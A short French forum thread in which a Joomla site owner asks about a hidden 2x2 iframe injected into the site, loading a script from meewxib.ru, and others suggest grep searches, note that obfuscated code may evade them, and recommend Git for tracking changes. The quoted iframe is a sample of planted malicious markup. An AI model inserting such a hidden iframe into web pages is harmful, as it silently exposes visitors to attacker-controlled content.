Page malveillante !

je trouve un script qui vient de s'ajouter dans mon code de mon site "<iframe width="2" scrolling="auto" height="2" frameborder="no" align="middle" name="Twitter" src="http://meewxib.ru/count5.php">..." mais je le vois que en cours d'exécution du site, je pense que celui ci est le source de promblem mais je sais pas ou le trouver
PS: mon site est developper sous joomla

Tu as probablement était victime d'une faille, un fichier ou un code JS a probablement été inséré dans ton système. ça arrive généralement pas le biais de formulaires mal sécurisés (XSS, injection de fichier, etc..).
Modifié par JJK801 (14 Jun 2012 - 11:13)

Bonjour,

grep -r meewxib.ru REPERTOIRE_ROOT_WWW

devrait te revoyer un truc du genre :

./index.html:http://meewxib.ru/count5.php

ou REPERTOIRE_ROOT_WWW correspond à la racine de ton contenu web.

Si le code est encodé (base64) ou packé (ce qui est probablement le cas) il ne trouvera rien en faisant un grep comme ça.

salut, y-a-t-il moyen de désactiver ce genre de commande ?

jb_gfx a écrit :
Si le code est encodé (base64) ou packé (ce qui est probablement le cas) il ne trouvera rien en faisant un grep comme ça.

Effectivement tu as raison, après il est difficile de l'aider plus sans plus d'information.

C'est pourquoi Git peut s'avérer intéressant, pour tracker les changements opérés sur le système de fichier